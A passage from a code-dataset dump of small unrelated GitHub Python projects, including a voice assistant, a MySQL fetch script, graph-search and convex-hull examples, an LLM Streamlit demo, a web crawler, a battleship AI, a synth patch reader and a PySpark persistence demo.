r.recognize_google(audio, language='en-US')\n        print(\"You said:\" +data)\n    except sr.UnknownValueError:\n        print(\"I cant hear you\")\n    except sr.RequestError as e:\n        print(\"Request failed\")\n    return data\n\ndef respond(string):\n    print(string)\n    tts = gTTS(text=string, lang = \"en\")\n    tts.save(\"speech.mp3\")\n    playsound.playsound(\"speech.mp3\")\n    os.remove(\"speech.mp3\")\n\ndef voice_assistant(data):\n    # keep listening unless the user says \"stop\"; return the flag to the main loop\n    listening = True\n    if \"how are you\" in data:\n        respond(\"I am well\")\n\n    if \"time\" in data:\n        respond(ctime())\n\n    if \"stop\" in data:\n        listening = False\n        print(\"listening stopped\")\n        respond(\"see you jagadeesh\")\n\n    return listening\n\ntime.sleep(2)\nrespond(\"hello jagadeesh, what can i do for you\")\nlistening = True\nwhile listening == True:\n    data = listen()\n    listening = voice_assistant(data)\n    \n    \n","repo_name":"Jagadeeshroy/virtual-assistant","sub_path":"virtual_assistant.py","file_name":"virtual_assistant.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"11392679007","text":"# import required modules\r\nimport mysql.connector\r\n \r\n# create connection 
object\r\ncon = mysql.connector.connect(\r\n host=\"147.226.187.252\", user=\"justin\",\r\n password=\"xia\", database=\"phplogin\")\r\n \r\n# create cursor object\r\ncursor = con.cursor()\r\n\r\n# assign data query\r\nquery = \"select * from cards\"\r\n \r\n# executing cursor\r\ncursor.execute(query)\r\n \r\n# display all records\r\nforms = cursor.fetchall()\r\n \r\nline=[] \r\nrows=[]\r\n\r\n# fetch all columns\r\nfor row in forms:\r\n for x in row:\r\n line.append(x)\r\n if(line[0]==\"Other\"):\r\n line.pop(0)\r\n else:\r\n line.pop(1) \r\n rows.append(line)\r\n print(line[4])\r\n line=[]\r\n \r\nprint(rows)\r\n\r\n\r\n#sql = \"UPDATE customers SET address = %s WHERE address = %s\"\r\n#val = (\"Valley 345\", \"Canyon 123\")\r\n\r\n#cursor.execute(sql, val)\r\n\r\n#con.commit()\r\n\r\n#print(cursor.rowcount, \"record(s) affected\")\r\n \r\n# closing cursor connection\r\ncursor.close()\r\n \r\n# closing connection object\r\ncon.close()","repo_name":"justinqxia/cardsystem","sub_path":"fetchdata.py","file_name":"fetchdata.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"43045422117","text":"import math\nimport random\nimport itertools\nimport operator\nimport collections\nimport alvi.client.containers\nimport alvi.client.utils\nfrom alvi.client.containers.cartesian import Line\nimport alvi.client.api.cartesian as cartesian\nfrom . import base\nimport logging\n\nlog = logging.getLogger(__package__)\nCoordinates = collections.namedtuple('Coordinates', 'x y')\nVector = Coordinates\nPointWithDetails = collections.namedtuple('PointWithDetails', 'point angle distance')\n\n\ndef angle(p0, p1):\n p0_to_p1 = Vector(p1.x - p0.x, p1.y - p0.y)\n len_b = math.sqrt(p0_to_p1.x**2 + p0_to_p1.y**2)\n #derived from dot product definition - the second vector is (1, 0)\n cos_ = p0_to_p1.x / len_b\n return -cos_\n\n\ndef distance(p0, p1):\n section = Vector(p1.x - p0.x, p1.y - p0.y)\n return math.sqrt(section.x**2 + section.y**2)\n\n\ndef cross_product(p0, p1, p2):\n return ((p1.x-p0.x)*(p2.y-p0.y)) - ((p2.x-p0.x)*(p1.y - p0.y))\n\n\nclass LineStack():\n\n def __init__(self, container):\n self.container = container\n self.points = []\n self._popped_since_last_sync = 0\n self._lines = []\n\n def pop(self):\n self.points.pop()\n self._popped_since_last_sync += 1\n\n def push(self, point):\n self.points.append(point)\n if len(self.points) > 1:\n self._sync_after_push()\n\n def _sync_after_push(self):\n if self._popped_since_last_sync == 0:\n self._lines.append(Line(self.container, self.points[-2], self.points[-1]))\n elif self._popped_since_last_sync == 1:\n self._lines[-1].point_to = self.points[-1]\n self._popped_since_last_sync = 0\n else:\n for i in range(self._popped_since_last_sync-1):\n cartesian.remove_line(self.container._pipe, self._lines.pop().id)\n self.container.sync()\n self._lines[-1].point_to = self.points[-1]\n self._popped_since_last_sync = 0\n self.container.sync()\n\n\nclass GrahamConvexHull(base.Scene):\n def run(self, **kwargs):\n container = kwargs['container']\n data_generator = kwargs['data_generator']\n self.generate_nodes(container, data_generator)\n self.find_convex_hull(container)\n\n def generate_nodes(self, container, data_generator):\n #create a set of unique 2d points\n all_points = [Coordinates(*xy) for xy in itertools.product(range(1, 46), range(1, 16))]\n random.shuffle(all_points)\n for point in all_points[:45]:\n container.create_point(point)\n container.sync()\n\n def 
find_convex_hull(self, container):\n lowest_leftmost_point, rest_points = self.find_lowest_leftmost(container.points)\n rest_points = self.sort_by_angle_from_lowest(lowest_leftmost_point, rest_points)\n rest_points = self.remove_points_with_same_angle(rest_points)\n\n line_stack = LineStack(container)\n line_stack.push(lowest_leftmost_point)\n line_stack.push(rest_points[0].point)\n line_stack.push(rest_points[1].point)\n\n for point in rest_points[2:]:\n while cross_product(line_stack.points[-2], line_stack.points[-1], point.point) < 0:\n line_stack.pop()\n line_stack.push(point.point)\n line_stack.push(lowest_leftmost_point)\n\n def find_lowest_leftmost(self, points):\n sorted_points = sorted(points, key=operator.attrgetter('y', 'x'))\n lowest_leftmost_point = sorted_points[0]\n return lowest_leftmost_point, sorted_points[1:]\n\n def sort_by_angle_from_lowest(self, origin_point, points):\n p0 = origin_point\n points_with_angles_and_distances = [\n PointWithDetails(p, angle(p0, p), distance(p0, p)) for p in points\n ]\n all_other_points = sorted(\n points_with_angles_and_distances,\n key=operator.attrgetter('angle', 'distance'))\n return all_other_points\n\n def remove_points_with_same_angle(self, rest_points):\n \"\"\"\n Point sorted by angle and distance from origin\n - if angle is the same, leaves only the furthest one\n \"\"\"\n all_other_points_unique = []\n last_point = rest_points[-1]\n all_other_points_unique.append(last_point)\n for current_point in reversed(rest_points[:-1]):\n old_angle = last_point.angle\n new_angle = current_point.angle\n if old_angle != new_angle:\n all_other_points_unique.append(current_point)\n last_point = current_point\n all_other_points_unique = list(reversed(all_other_points_unique))\n return all_other_points_unique\n\n @staticmethod\n def container_class():\n return alvi.client.containers.Cartesian\n\n\nif __name__ == \"__main__\":\n GrahamConvexHull.start()","repo_name":"alviproject/alvi","sub_path":"alvi/client/scenes/graham_convex_hull.py","file_name":"graham_convex_hull.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"} +{"seq_id":"73559737822","text":"import csv\nimport sys\n\nfrom util import Node, StackFrontier, QueueFrontier\n\n# Maps names to a set of corresponding person_ids\nnames = {}\n\n# Maps person_ids to a dictionary of: name, birth, movies (a set of movie_ids)\npeople = {}\n\n# Maps movie_ids to a dictionary of: title, year, stars (a set of person_ids)\nmovies = {}\n\n\ndef load_data(directory):\n \"\"\"\n Load data from CSV files into memory.\n \"\"\"\n # Load people\n with open(f\"{directory}/people.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n people[row[\"id\"]] = {\n \"name\": row[\"name\"],\n \"birth\": row[\"birth\"],\n \"movies\": set()\n }\n if row[\"name\"].lower() not in names:\n names[row[\"name\"].lower()] = {row[\"id\"]}\n else:\n names[row[\"name\"].lower()].add(row[\"id\"])\n\n # Load movies\n with open(f\"{directory}/movies.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n movies[row[\"id\"]] = {\n \"title\": row[\"title\"],\n \"year\": row[\"year\"],\n \"stars\": set()\n }\n\n # Load stars\n with open(f\"{directory}/stars.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n try:\n people[row[\"person_id\"]][\"movies\"].add(row[\"movie_id\"])\n movies[row[\"movie_id\"]][\"stars\"].add(row[\"person_id\"])\n except 
KeyError:\n pass\n\n\ndef main():\n if len(sys.argv) > 2:\n sys.exit(\"Usage: python degrees.py [directory]\")\n directory = sys.argv[1] if len(sys.argv) == 2 else \"large\"\n\n # Load data from files into memory\n print(\"Loading data...\")\n load_data(directory)\n print(\"Data loaded.\")\n\n source = person_id_for_name(input(\"Name: \"))\n if source is None:\n sys.exit(\"Person not found.\")\n target = person_id_for_name(input(\"Name: \"))\n if target is None:\n sys.exit(\"Person not found.\")\n\n path = shortest_path(source, target)\n\n if path is None:\n print(\"Not connected.\")\n else:\n degrees = len(path)\n print(f\"{degrees} degrees of separation.\")\n path = [(None, source)] + path\n for i in range(degrees):\n person1 = people[path[i][1]][\"name\"]\n person2 = people[path[i + 1][1]][\"name\"]\n movie = movies[path[i + 1][0]][\"title\"]\n print(f\"{i + 1}: {person1} and {person2} starred in {movie}\")\n\n\ndef shortest_path(source, target):\n \"\"\"\n Returns the shortest list of (movie_id, person_id) pairs\n that connect the source to the target.\n\n If no possible path, returns None.\n \"\"\"\n\n start = Node(state=source, parent=None, action=None)\n # We use a queue frontier for Breadth First Search\n frontier = QueueFrontier()\n frontier.add(start)\n # Keeping track of which nodes we explored so we dont back track to them\n explored = set()\n\n\n while True:\n # If there is no path/solution, return None\n if frontier.empty():\n return None\n\n # Remove a node for testing\n node = frontier.remove()\n\n # The node we are currently on is now being explored\n explored.add(node.state)\n\n # Find all the neighbors of the source\n for action, state in neighbors_for_person(node.state):\n # If our current item in the frontier does not contain the current actor and it hasnt been explored already\n if not frontier.contains_state(state) and state not in explored:\n \n child = Node(state=state, parent=node, action=action)\n # For efficiency, before adding the node to the frontier I check if it is our goal as indicated by the given hint \n if child.state == target:\n solution = []\n while child.parent is not None:\n solution.insert(0,(child.action, child.state))\n child = child.parent\n return solution\n else:\n frontier.add(child)\n\n\n\ndef person_id_for_name(name):\n \"\"\"\n Returns the IMDB id for a person's name,\n resolving ambiguities as needed.\n \"\"\"\n person_ids = list(names.get(name.lower(), set()))\n if len(person_ids) == 0:\n return None\n elif len(person_ids) > 1:\n print(f\"Which '{name}'?\")\n for person_id in person_ids:\n person = people[person_id]\n name = person[\"name\"]\n birth = person[\"birth\"]\n print(f\"ID: {person_id}, Name: {name}, Birth: {birth}\")\n try:\n person_id = input(\"Intended Person ID: \")\n if person_id in person_ids:\n return person_id\n except ValueError:\n pass\n return None\n else:\n return person_ids[0]\n\n\ndef neighbors_for_person(person_id):\n \"\"\"\n Returns (movie_id, person_id) pairs for people\n who starred with a given person.\n \"\"\"\n movie_ids = people[person_id][\"movies\"]\n neighbors = set()\n for movie_id in movie_ids:\n for person_id in movies[movie_id][\"stars\"]:\n neighbors.add((movie_id, person_id))\n return neighbors\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"amanudde1999/CS50-AI","sub_path":"degrees/degrees.py","file_name":"degrees.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} 
+{"seq_id":"18158981269","text":"import requests\nimport streamlit as st\nfrom streamlit_lottie import st_lottie\n\nimport torch\nfrom transformers import pipeline\n\nfrom langchain import PromptTemplate, LLMChain\nfrom langchain.llms import HuggingFacePipeline\n\n# Helper functions\ndef load_lottieurl(url):\n    r = requests.get(url)\n    if r.status_code != 200:\n        return None\n    return r.json()\n\ndef local_css(file_name):\n    with open(file_name) as f:\n        st.markdown(f\"<style>{f.read()}</style>\", unsafe_allow_html=True)\n\ndef change_session_state():\n    st.session_state[\"run started\"] = True\n\n# ASSETS\nlottie_robot = load_lottieurl(\"https://assets3.lottiefiles.com/packages/lf20_eZGSBU1hRJ.json\")\n\n# PAGE INFO\nst.set_page_config(page_title=\"EHR Capture\", page_icon=\":mechanical_arm:\") #, layout=\"wide\")\n\n# CSS\nlocal_css(\"style/style.css\")\n\n# Load Models\ndolly = 'C:/Users/c062387/OneDrive - Thrivent Financial/Documents/Documents/UW Analytics Team/GitRepos/question-answer-app/dolly/'\nxdoc = 'C:/Users/c062387/OneDrive - Thrivent Financial/Documents/Documents/UW Analytics Team/GitRepos/question-answer-app/xdoc/squad2/'\n\n@st.cache_data\ndef get_models(dolly, xdoc):\n    generate_text = pipeline(model=dolly, torch_dtype=torch.bfloat16,\n                             trust_remote_code=True, device_map=\"auto\", return_full_text=True)\n\n    # qa_model = pipeline('question-answering', model=xdoc, tokenizer=xdoc)\n\n    return generate_text #, qa_model\n\n# generate_text, qa_model = get_models(dolly, xdoc)\ngenerate_text = get_models(dolly, xdoc)\n\n# Dolly Template\nprompt_with_context = PromptTemplate(\n    input_variables=[\"instruction\", \"context\"],\n    template=\"{instruction}\\n\\nInput:\\n{context}\")\n\nhf_pipeline = HuggingFacePipeline(pipeline=generate_text)\n\nllm_context_chain = LLMChain(llm=hf_pipeline, prompt=prompt_with_context)\n\n# Ask questions\ndef ask_xdoc(question, context):\n    return qa_model({'question': question,'context': context}).get('answer')\n\ndef ask_dolly(question, context):\n    return llm_context_chain.predict(instruction=question, context=context).lstrip()\n\n\n# HEADER SECTION\nwith st.container():\n    st_lottie(lottie_robot, height=200, key=\"robot\")\n    row1_col1, row1_col2, row1_col3 = st.columns((1, 3, 1))\n    with row1_col1:\n        pass\n    with row1_col2:\n        st.markdown(\"
<h1>LLM Experimentation</h1>
\", unsafe_allow_html=True)\n with row1_col3:\n pass\n\n st.write(\"##\")\n\n with st.form('my_form'):\n\n context = st.text_area('Enter the context', 'George Washington (February 22, 1732[b] - December 14, 1799) was an American military officer, statesman, and Founding Father who served as the first president of the United States from 1789 to 1797.')\n\n question = st.text_area('Enter your question', value='When was George Washington president?')\n\n submitted = st.form_submit_button('Ask')\n\n if submitted:\n col1, col2 = st.columns((1, 1))\n\n with col1:\n st.markdown('**XDoc Response**')\n # st.info(ask_xdoc(question, context))\n\n with col2:\n st.markdown('**Dolly Response**')\n st.info(ask_dolly(question, context))\n \n else: \n col1, col2 = st.columns((1, 1))\n\n with col1:\n st.markdown('**XDoc Response**')\n\n with col2:\n st.markdown('**Dolly Response**')\n\n\n\n# question = \"When was George Washington president?\"\n# context = \"\"\"George Washington (February 22, 1732[b] - December 14, 1799) was an American military officer, statesman,\n# and Founding Father who served as the first president of the United States from 1789 to 1797.\"\"\"\n\n\n\n\n# print(llm_context_chain.predict(instruction=question, context=context).lstrip())\n\n# qa_model({'question': question,'context': context}).get('answer')\n\n","repo_name":"RyanKnitter/question-answer-app","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19915032157","text":"import requests\nimport re\n\n\nclass SpiderBot:\n\n def __init__(self):\n self.found_urls = [] # we save url to omit repetitions\n self.iter = 1 # we track the number of found urls\n\n def crawl(self, first_url):\n\n queue = [first_url]\n self.found_urls.append(first_url)\n\n # breadth-first-search algorithm\n while queue:\n\n current_url = queue.pop(0)\n print(f\"{self.iter}: {current_url}\")\n self.iter += 1\n\n for url in self.get_urls_from_url(current_url):\n if url not in self.found_urls:\n self.found_urls.append(url)\n queue.append(url)\n\n def get_urls_from_url(self, url):\n try:\n html = requests.get(url, timeout=10).text\n except:\n return []\n\n return re.findall(r\"https?://[\\w.-]+\\.[a-z]{2,3}\", html)\n \"\"\" \n The regex finds urls in the html. 
However, the pattern is a rough approximation and\n        not ideal, but it works well enough here.\n        \"\"\"\n\nif __name__ == '__main__':\n\n    crawler = SpiderBot()\n    crawler.crawl('https://stackoverflow.com')\n\n","repo_name":"KornelWitkowski/AI-Algorithms","sub_path":"Algorithms/SpiderBot/SpiderBot.py","file_name":"SpiderBot.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7192903117","text":"from utils import *\nimport threading, os\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# Class for an AI based on monte-carlo simulation\nclass AI:\n    def __init__(self, env, samples):\n        self.env = env\n        self.move_sim = samples # The number of moves to simulate\n        self.priority = 5 # The priority to give simulations that intersect hits\n\n    # Evaluate the model by running it many times and averaging the scores\n    def eval_model(self, evals):\n        scores = []\n        for i in range(evals):\n            scores.append(self.run(i))\n            print(f\"Game {i}/{evals} \\n Score: {scores[-1]}\")\n        print(np.mean(scores))\n\n    # Take in the board state and return probabilities of a ship being somewhere\n    def monte_carlo(self, state, out_path):\n        simulations = []\n\n        # simulate self.move_sim random ship placements on the current board state\n        for i in range(self.move_sim):\n            self.env.simulate_board.update(state)\n            brd, intersect = self.env.simulate_board.simulate_ship()\n\n            # If we intersect a hit, take into account priority and overlap\n            if intersect:\n                for _ in range(self.priority):\n                    for _ in range(intersect):\n                        simulations.append(brd)\n            simulations.append(brd)\n\n        # Mean the ship simulations down the stacked axis to calculate percentages\n        simulations = np.array(simulations)\n        percentages = np.mean(simulations, axis=0)\n\n        # Output a heatmap if specified\n        if out_path != '':\n            fig = plt.figure(figsize=(8, 8))\n            fig.add_subplot(1, 2, 1)\n            plt.imshow(percentages, cmap='hot', interpolation='nearest')\n            fig.add_subplot(1, 2, 2)\n            plt.imshow(state.get_board() * 5, cmap='bwr', interpolation=None)\n            plt.savefig(out_path)\n            plt.close(fig)\n\n        return percentages\n\n    # Get the AI to run a game of battleships on its own for testing\n    def run(self, r_count):\n        s = self.env.reset()\n        done = False\n        count = 0\n        while not done:\n            count += 1\n            if not os.path.exists(f'save_file_{r_count}/'):\n                os.mkdir(f'save_file_{r_count}/')\n            s, done = self.env.step(self.monte_carlo(s, f'save_file_{r_count}/{count}.png'))\n            # s.print_board()\n        print(f\"SCORE: {np.count_nonzero(s.get_board() == 0)}\")\n        return np.count_nonzero(s.get_board() == 0)\n\n    # Use the monte carlo simulation algorithm to predict a move against a player and make that move\n    def move(self):\n        return self.env.step(self.monte_carlo(self.env.attack_board, ''))\n\n\n\n","repo_name":"mitchelljy/battleships_ai","sub_path":"ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"7"} +{"seq_id":"3327311246","text":"import logging\nimport time\nimport aioredis\nimport asyncio\nimport uvloop\nimport redis\nfrom functools import wraps\nfrom sanic.response import json\nfrom config import TOKEN\nfrom config import REDIS_HOST, REDIS_PORT, REDIS_DB\nfrom logging.handlers import RotatingFileHandler\n\n\ndef log(level, message):\n\n    logger = logging.getLogger('socket')\n\n    # If logger.handlers is empty, add a handler here; otherwise just write the log\n    if not logger.handlers:\n        log_name = 'socket.log'\n        log_count = 2\n        log_format = '%(asctime)s %(levelname)s %(module)s %(funcName)s-[%(lineno)d] 
%(message)s'\n log_level = logging.INFO\n max_bytes = 10 * 1024 * 1024\n handler = RotatingFileHandler(log_name, mode='a', maxBytes=max_bytes, backupCount=log_count)\n handler.setFormatter(logging.Formatter(log_format))\n logger.setLevel(log_level)\n logger.addHandler(handler)\n\n if level == 'info':\n logger.info(message)\n if level == 'error':\n logger.error(message)\n\n\ndef auth(token):\n def wrapper(func):\n @wraps(func)\n async def auth_token(req, *arg, **kwargs):\n try:\n value = req.headers.get(token)\n if value and TOKEN == value:\n r = await func(req, *arg, **kwargs)\n return json({'retcode': 0, 'stdout': r})\n else:\n return json({'retcode': 1, 'stderr': 'status{}'.format(403)})\n except Exception as e:\n log('error', str(e))\n return json({'retcode': 1, 'stderr': str(e)})\n return auth_token\n return wrapper\n\n\ndef timethis(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n start = time.perf_counter()\n r = func(*args, **kwargs)\n end = time.perf_counter()\n print('{}.{} : {}'.format(func.__module__, func.__name__, end - start))\n return r\n return wrapper\n\n\nasync def producer_redis(loop, message):\n\n start_time = time.time()\n redis = await aioredis.create_redis_pool(\n 'redis://127.0.0.1:6379', db=0, loop=loop)\n await redis.rpush('log-message', message)\n redis.close()\n await redis.wait_closed()\n print(time.time() - start_time)\n\nasyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\nloop = uvloop.new_event_loop()\n\n\ndef rpush_redis(msg_list):\n try:\n start_time = time.time()\n pool = redis.ConnectionPool(host=REDIS_HOST, port=REDIS_PORT, db=REDIS_DB, max_connections=10)\n r = redis.StrictRedis(connection_pool=pool)\n [r.rpush(\"log-msg\", i) for i in msg_list]\n print(time.time() - start_time)\n # async def test():\n # print(1)\n # redis = await aioredis.create_redis_pool(\n # 'redis://127.0.0.1:6379', db=0, loop=loop)\n # await redis.rpush('log-msg', msg)\n # redis.close()\n # await redis.wait_closed()\n # loop.run_until_complete(test())\n except Exception as e:\n log('error', str(e))\n\n\n","repo_name":"hugoren/socket_uvloop","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"16902328993","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\n# Vehicle parameter\nW = 1.8 #[m] width of vehicle\nLF = 3.7 #[m] distance from rear to vehicle front end of vehicle\nLB = 1.0 #[m] distance from rear to vehicle back end of vehicle\nTR = 0.5 # Tyre radius [m] for plot\nTW = 1.0 # Tyre width [m] for plot\nMAX_STEER = 0.6 #[rad] maximum steering angle\nWB = 2.7 #[m] wheel base: rear to front steer\n\ndef plot_trailer(x, y, yaw, steer, retrun_trailer = False):\n truckcolor = \"-k\"\n\n LENGTH = LB+LF\n\n truckOutLine = np.array([[-LB, (LENGTH - LB), (LENGTH - LB), (-LB), (-LB)],\n [W / 2, W / 2, - W / 2, - W / 2, W / 2]])\n\n\n rr_wheel = np.array([[TR, - TR, - TR, TR, TR],\n [-W / 12.0 + TW, - W / 12.0 + TW, W / 12.0 + TW, W / 12.0 + TW, - W / 12.0 + TW]])\n\n rl_wheel = np.array([[TR, - TR, - TR, TR, TR],\n [-W / 12.0 - TW, - W / 12.0 - TW, W / 12.0 - TW, W / 12.0 - TW, - W / 12.0 - TW]])\n\n fr_wheel = np.array([[TR, - TR, - TR, TR, TR],\n [- W / 12.0 + TW, - W / 12.0 + TW, W / 12.0 + TW, W / 12.0 + TW, - W / 12.0 + TW]])\n\n fl_wheel = np.array([[TR, - TR, - TR, TR, TR],\n [-W / 12.0 - TW, - W / 12.0 - TW, W / 12.0 - TW, W / 12.0 - TW, - W / 12.0 - TW]])\n\n Rot1 = np.array([[math.cos(yaw), 
math.sin(yaw)],\n [-math.sin(yaw), math.cos(yaw)]])\n Rot2 = np.array([[math.cos(steer), math.sin(steer)],\n [-math.sin(steer), math.cos(steer)]])\n\n\n fr_wheel = np.dot(fr_wheel.T, Rot2).T\n fl_wheel = np.dot(fl_wheel.T, Rot2).T\n fr_wheel[0,:] += WB\n fl_wheel[0,:] += WB\n fr_wheel = np.dot(fr_wheel.T, Rot1).T\n fl_wheel = np.dot(fl_wheel.T, Rot1).T\n\n truckOutLine = np.dot(truckOutLine.T, Rot1)\n\n rr_wheel = np.dot(rr_wheel.T, Rot1).T\n rl_wheel = np.dot(rl_wheel.T, Rot1).T\n\n truckOutLine = truckOutLine.T\n truckOutLine[0,:] += x\n truckOutLine[1,:] += y\n fr_wheel[0, :] += x\n fr_wheel[1, :] += y\n rr_wheel[0, :] += x\n rr_wheel[1, :] += y\n fl_wheel[0, :] += x\n fl_wheel[1, :] += y\n rl_wheel[0, :] += x\n rl_wheel[1, :] += y\n\n if retrun_trailer == False:\n plt.plot(x, y, \"*\")\n plt.plot(fr_wheel[0, :], fr_wheel[1, :], truckcolor)\n plt.plot(rr_wheel[0, :], rr_wheel[1, :], truckcolor)\n plt.plot(fl_wheel[0, :], fl_wheel[1, :], truckcolor)\n plt.plot(rl_wheel[0, :], rl_wheel[1, :], truckcolor)\n plt.plot(truckOutLine[0, :], truckOutLine[1, :], truckcolor)\n else:\n return truckOutLine[0, :], truckOutLine[1, :]","repo_name":"ChenBohan/Robotics-Cooperative-Path-Planning-03-Hybrid-A-Star-Trajectory-Planning","sub_path":"lib/vehicle.py","file_name":"vehicle.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":118,"dataset":"github-code","pt":"7"} +{"seq_id":"27558113019","text":"from pathlib import Path\nimport io\nfrom k1data import K1patch, K1library\n\ndef pr_peek(filebuffer, bytestoread):\n return (filebuffer.peek(bytestoread)[:bytestoread])\n\ndef read_bankfiles(infiles, k1library):\n for infile in infiles:\n bankfile = open(infile, \"rb\")\n while bankfile.peek(1) :\n if (pr_peek(bankfile, 1)) == b'\\xF0':\n bankfile.seek(7, io.SEEK_CUR)\n if pr_peek(bankfile, 1) == b'\\x00' or \\\n pr_peek(bankfile, 1) == b'\\x20':\n #single\n bankfile.seek(1, io.SEEK_CUR)\n while pr_peek(bankfile, 1) != b'\\xF7':\n datachunk = bankfile.read(88)\n if len(datachunk) < 88:\n break\n patch = K1patch(datachunk, Path(infile).stem)\n k1library.add_single(patch)\n elif pr_peek(bankfile, 1) == b'\\x40':\n #multi\n while pr_peek(bankfile, 1) != b'\\xF7':\n datachunk = bankfile.read(76)\n if len(datachunk) < 76:\n break\n patch = K1patch(datachunk, Path(infile).stem)\n k1library.add_multi(patch)\n else:\n print(\"error\")\n #pass#unexpected sysex format\n else:\n bankfile.seek(1, io.SEEK_CUR)\n #end while\n k1library.add_bankname(Path(infile).stem)\n bankfile.close()\n","repo_name":"markussundstrom/k1manager","sub_path":"k1filereader.py","file_name":"k1filereader.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34335680936","text":"#####################################################\n# RDD persistence example\n#####################################################\n\nimport pyspark\nimport time\n\nsc = pyspark.SparkContext(appName='persist')\n\n\n#############################################################################\n# read in citation data, count total number of citations, and total\n# number of citations on Christmas, summarize states that are\n# cited on Christmas\n#############################################################################\n\nfile = '2016-12.csv'\n\n# Specifies RDD lineage: \n# (1) read data from file\nrdd = sc.textFile(file)\n\n# Action requires execution of entire lineage\n# (1) read data from file\n# Then count 
the number of records (which is the number of lines in the file)\nrdd.count()\n\n# is rdd cached?\nrdd.is_cached\n\n# Addition to RDD lineage:\n# (2) filter data to include only citations from 12/25/2016\nrdd = rdd.filter(lambda x: x.split(',')[1] == '2016-12-25')\n\n# Action requires execution of entire lineage\n# (1) read data from file\n# (2) filter data to include only citations from 12/25/2016\n# Then count the number of records (number of citations on 12/25/2016)\nrdd.count()\n\n\n# Addition to RDD lineage:\n# (3) create pair RDDs where key = state and value = original record \nrdd = rdd.keyBy(lambda x: x.split(',')[2])\n\n\n# Action requires execution of entire lineage\n# (1) read data from file\n# (2) filter data to include only citations from 12/25/2016\n# (3) create pair RDDs where key = state and value = original record \n# Then return dictionary counting number of results by key\nrdd.countByKey()\n\n###########################################################################\n# persist will store rdd in memory (by default)\n###########################################################################\n\n# This rdd will persist (in memory) the next time it is computed\nrdd.persist()\nrdd.is_cached\n\n# Action requires execution of entire lineage, but RDD is stored in memory\n# (1) read data from file\n# (2) filter data to include only citations from 12/25/2016\n# (3) create pair RDDs where key = state and value = original record \n# The RDD in (3) is set to persist, so this RDD is stored in memory\n# Then return dictionary counting number of results by key\nrdd.count()\n\n# Action requires execution of lineage, starting with last persistent RDD,\n# which is the RDD in lineage step (3)\n# (1) (NOT EXECUTED) read data from file\n# (2) (NOT EXECUTED) filter data to include only citations from 12/25/2016\n# (3) (NOT EXECUTED) create pair RDDs where key = state and value = original record \n# Uses 'rdd' from memory to return a dictionary counting results by key\nrdd.countByKey()\n\n\n\n###########################################################\n# Function that times how long it takes to \n###########################################################\n\ndef time_rdd(file, persist = False) : \n start = time.time()\n \n rdd = sc.textFile(file)\n\n # count total number of citations\n rdd.count()\n\n # filter citations to include only those given on Christmas\n rdd = rdd.filter(lambda x: x.split(',')[1] == '2016-12-25')\n \n # if specified, persist this rdd\n if persist :\n rdd.persist()\n\n # count the total number of citations (on Christmas)\n rdd.count()\n\n # get number of citations per state on Christmas\n rdd.keyBy(lambda x: x.split(',')[2]).countByKey()\n\n end = time.time()\n \n return end - start\n\n\n\n\n# lists to store times\nt1 = []\nt2 = []\n\nr = range(1,11) \nfor num in r :\n print(\"Iteration #\", num)\n \n #time execution without persistence\n time1 = time_rdd(file, False)\n t1.append(time1)\n \n # time execution with persistence\n time2 = time_rdd(file,True)\n t2.append(time2)\n\n \n\n######################################################################\n# Compare execution times with and without persistence\n######################################################################\n \n\n# import libraries for plotting\nimport matplotlib.pyplot as plt\nimport pandas as pd\n \n# Data\ndf=pd.DataFrame({'num': r, 't1': t1, 't2': t2})\n \n# multiple line plot\nplt.plot( 'num', 't1', data=df, color='blue', label = 'persistence=no')\nplt.plot( 'num', 't2', data=df, marker='', 
color='maroon', label = 'persistence=yes')\nplt.xlabel(\"iteration #\")\nplt.ylabel(\"time (seconds)\")\n\nplt.legend()\n\n\n# stop the Spark Context\nsc.stop()\n\n\n\n\n\n\n\n\n\n","repo_name":"gdancik/CSC-343","sub_path":"data/notes/persist.py","file_name":"persist.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"15667941800","text":"from __future__ import annotations\n\nimport asyncore\nimport logging\nimport traceback\n\nfrom . import logger\nfrom Qt import QtCore\n\n\nclass ThreadBridgeReceiver(QtCore.QObject):\n response = QtCore.Signal(str)\n\nclass ThreadResponder(QtCore.QObject):\n response = QtCore.Signal(str)\n\n\nclass Server(asyncore.dispatcher):\n \"\"\"\n Receives connections and establishes handlers for each client.\n \"\"\"\n\n def __init__(self, address: tuple[str, int], thread:ServerThread) -> None:\n super().__init__()\n self.thread = thread\n self.logger.log_to(\"Server\")\n self.response_handler = None\n self.create_socket()\n self.bind(address)\n _address = self.socket.getsockname()\n 